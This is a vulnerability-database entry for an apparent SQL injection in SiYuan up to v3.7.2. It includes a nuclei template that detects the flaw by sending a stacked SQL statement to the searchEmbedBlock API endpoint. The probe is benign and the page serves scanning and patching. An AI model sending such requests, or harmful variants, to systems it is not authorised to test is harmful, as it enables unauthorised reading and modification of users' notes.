Lucene search
+L

SiYuan - SQL Execution

🗓️ 19 Aug 2026 04:15:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

SQL injection in SiYuan <= v3.7.2 allows unauthenticated users to read and modify all cleartext notebooks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-69084
3 Aug 202613:20
attackerkb
circl
Circl
CVE-2026-69084
4 Aug 202606:00
circl
cve
CVE
CVE-2026-69084
3 Aug 202613:20
cve
cvelist
Cvelist
CVE-2026-69084 SiYuan before v3.7.3 SQL Injection via searchEmbedBlock
3 Aug 202613:20
cvelist
githubexploit
GithubExploit
Exploit for CVE-2026-69084
9 Aug 202620:02
githubexploit
euvd
EUVD
EUVD-2026-52277
3 Aug 202613:20
euvd
nvd
NVD
CVE-2026-69084
3 Aug 202614:16
nvd
ptsecurity
Positive Technologies
PT-2026-67406
3 Aug 202600:00
ptsecurity
vulnrichment
Vulnrichment
CVE-2026-69084 SiYuan before v3.7.3 SQL Injection via searchEmbedBlock
3 Aug 202613:20
vulnrichment
id: CVE-2026-69084

info:
  name: SiYuan - SQL Execution
  author: Boreas37
  severity: critical
  description: |
    SiYuan <= v3.7.2 contains a SQL injection caused by passing client-supplied SQL statements verbatim to the main read-write database handle in /api/search/searchEmbedBlock, letting attackers with publish RoleReader token or anonymous access read and modify content, exploit requires publish RoleReader token or disabled publish authentication.
  impact: |
    Attackers can read and modify content across all opened cleartext notebooks, potentially compromising data integrity and confidentiality.
  remediation: |
    Update to version v3.7.3 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-vh22-h7hf-www7
    - https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchembedblock
    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10
    cve-id: CVE-2026-69084
    epss-score: 0.0029
    epss-percentile: 0.21522
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: 'title:"SiYuan"'
  tags: cve,cve2026,siyuan,sqli,authenticated

variables:
  auth_code: "{{password}}"

http:
  - raw:
      - |
        POST /api/system/loginAuth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"authCode":"{{auth_code}}"}

      - |
        POST /api/search/searchEmbedBlock HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; SELECT 2","excludeIDs":[],"headingMode":0,"breadcrumb":false}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":0'

      - type: word
        part: body
        words:
          - 'SQL statement is not single'
        negative: true

      - type: status
        status:
          - 200
# digest: 490a0046304402206e5257109fd75f93c494aa9dab608101598a28ffdc2117c0189cb713d0b0787c02200bff59b0eb8cc32249156c0185f0154701e2cd5e49c87a719974af7648d5ab46:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Aug 2026 09:59Current
5.7Medium risk
Vulners AI Score5.7
CVSS 49.9
CVSS 3.110
EPSS0.00913
SSVC
3